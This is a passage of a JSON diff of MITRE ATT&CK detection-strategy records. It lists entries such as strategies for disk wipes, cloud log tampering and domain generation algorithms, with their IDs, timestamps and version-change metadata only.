+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ff993025-1f12-486f-936f-6cc563050278",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0592",
+                            "external_id": "DET0592"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Data from Configuration Repository on Network Devices",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c5544183-4868-4a5c-ad8c-8a9359358298"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--79eb1874-4762-461b-a748-df85e61f3216",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0410",
+                            "external_id": "DET0410"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Data from Network Shared Drive",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--72ba4979-f786-4205-a5da-90874e12813f",
+                        "x-mitre-analytic--2d1d5482-b82b-45ff-9563-959766d373ff",
+                        "x-mitre-analytic--67ca77c9-074f-4c93-9592-cabe9ba8a831"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--22f3a380-389d-44f7-a846-c6223fc06ddd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0371",
+                            "external_id": "DET0371"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Debugger Evasion (T1622)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d5f0b652-3699-45af-97e6-81e7426558bd",
+                        "x-mitre-analytic--e4a9dd91-3354-40c8-a55c-941d53f2ddec",
+                        "x-mitre-analytic--c78d2e09-07d7-48ef-add1-bde622e502a2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8577b89d-01e2-4423-8657-caff7ed22737",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0563",
+                            "external_id": "DET0563"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Defense Impairment via Prevent Command History Logging across OS platforms.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1f69e126-e849-43a1-9fca-b5c63a154daa",
+                        "x-mitre-analytic--2a5f1993-7035-4d94-b9d1-7edb1850d4e1",
+                        "x-mitre-analytic--91870bc8-3a81-4d90-84e4-26c99b5642ef",
+                        "x-mitre-analytic--8ed1a27f-3a60-441d-b92d-dc7b086db459",
+                        "x-mitre-analytic--77450309-6789-4025-9817-d908c4ac9e5b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:25:01.924Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ff6c2db6-cc1b-47e0-89a6-536f83b74906",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0579",
+                            "external_id": "DET0579"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Device Driver Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--18e81e76-bae3-44c8-b573-dfd3564a00ad",
+                        "x-mitre-analytic--b55c3339-2d4c-4392-8d26-c257ea2f1bb9",
+                        "x-mitre-analytic--d9ee822c-6a91-4c83-9698-779ca0bf8663"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1221d0cb-6404-4fe7-837e-6057a96e7acb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0424",
+                            "external_id": "DET0424"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Disable or Modify Cloud Firewall",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ee7c904b-144f-4dc4-87af-7eee4655899c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f0190654-2eda-42a7-9a4d-6edc95aada02",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.391000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0289",
+                            "external_id": "DET0289"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Disable or Modify Cloud Log",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a788e3ed-8faf-4443-bb26-fd530ca930d1",
+                        "x-mitre-analytic--8e0f5333-9fc0-4f03-ae12-cf98903e08ea",
+                        "x-mitre-analytic--e42656e7-6a0e-492e-82b6-90d0d5667993",
+                        "x-mitre-analytic--967f7636-1547-4db7-921a-1b84f312a2cd"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.391000+00:00\", \"old_value\": \"2026-04-24T20:25:34.812Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1d769567-7e82-47f4-8dc8-5a503f524134",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0062",
+                            "external_id": "DET0062"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Disable or Modify Linux Audit System Log",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3e9734aa-b9b4-4716-927c-27c2c2aa972e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:25:52.122Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3a016ed2-47e0-414b-b90e-a44d1437354e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0316",
+                            "external_id": "DET0316"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Disk Content Wipe via Direct Access and Overwrite",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d1ad1b0b-0050-4737-8993-73c2da8d143b",
+                        "x-mitre-analytic--b55c84a0-d045-43f6-a5a9-e8f6edbd275e",
+                        "x-mitre-analytic--1065ad69-8969-4ae0-9df6-dc7e7b1129c2",
+                        "x-mitre-analytic--d0e64036-83fb-4ff7-b81b-9b67b6c6b9dc"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1dd8a02b-b447-48ed-a146-ad955c9b2dc1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0297",
+                            "external_id": "DET0297"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Disk Structure Wipe via Boot/Partition Overwrite",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--34560ac3-2e05-4394-8145-0cd6071c1680",
+                        "x-mitre-analytic--538707d4-df45-489b-97f5-0115802a701f",
+                        "x-mitre-analytic--575a9c01-6dac-4513-86ca-e80b6e485212",
+                        "x-mitre-analytic--d970c6c7-82d0-4977-9e2e-4b27af383ca5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--da01afef-b769-4d31-964d-901fabaf6a8f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0137",
+                            "external_id": "DET0137"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Disk Wipe via Direct Disk Access and Destructive Commands",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5dc85538-115c-4c56-878a-39caaba91e74",
+                        "x-mitre-analytic--d442d480-cfb9-43cc-b959-2f81513b432d",
+                        "x-mitre-analytic--2016853a-07eb-4df4-a471-69b55f82b34d",
+                        "x-mitre-analytic--8faa753d-ec3f-4694-9a33-03ce4ccb722f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--92ce4302-72cb-4b7b-9184-1fc14900d0e1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0366",
+                            "external_id": "DET0366"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Double File Extension Masquerading",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6eab694d-ea06-4487-99c4-0e21279530e8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--524a2282-e312-4707-82d1-2c34f015c85c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0569",
+                            "external_id": "DET0569"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Downgrade System Image on Network Devices",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--370daadc-e640-4487-8ba0-c897f46459bc"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--063eac3f-9c2a-429a-ad7c-ae7f49158bb2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0091",
+                            "external_id": "DET0091"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Dynamic API Resolution via Hash-Based Function Lookups",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--48a818ac-077b-46ff-b615-bb2958536aef"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--98d6523f-54c5-4a24-a758-333caa833967",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0039",
+                            "external_id": "DET0039"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Dynamic Resolution across OS Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7cf1b4ad-95e8-4bf0-8b2f-fc3c14938656",
+                        "x-mitre-analytic--00112bcc-174f-4201-ac81-fe3edd1292e6",
+                        "x-mitre-analytic--5e225927-bf50-4261-b1ae-d65e803da0b8",
+                        "x-mitre-analytic--3166927d-91e4-4e08-bfec-abda2783be8c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--510a02c8-4341-40ab-8b57-bd678c411ac0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0262",
+                            "external_id": "DET0262"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Dynamic Resolution through DNS Calculation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f47f256d-686f-4553-85e2-bd4d156da1e7",
+                        "x-mitre-analytic--98f5c157-17c8-4ab8-943d-8d4c54dc3d6d",
+                        "x-mitre-analytic--e95ed4e2-d6bc-4a6f-acbc-bdbfcbaca158",
+                        "x-mitre-analytic--18c20664-b820-4a14-a7bf-5a75ac2fae92"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--263a0357-5f6d-4066-bfda-afeb883e51d7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0419",
+                            "external_id": "DET0419"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Dynamic Resolution using Domain Generation Algorithms.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ee7499f8-4262-47cf-8fff-5344f60bf2cf",
+                        "x-mitre-analytic--0faa41a3-0d4c-42d1-885a-12436fbee9c1",
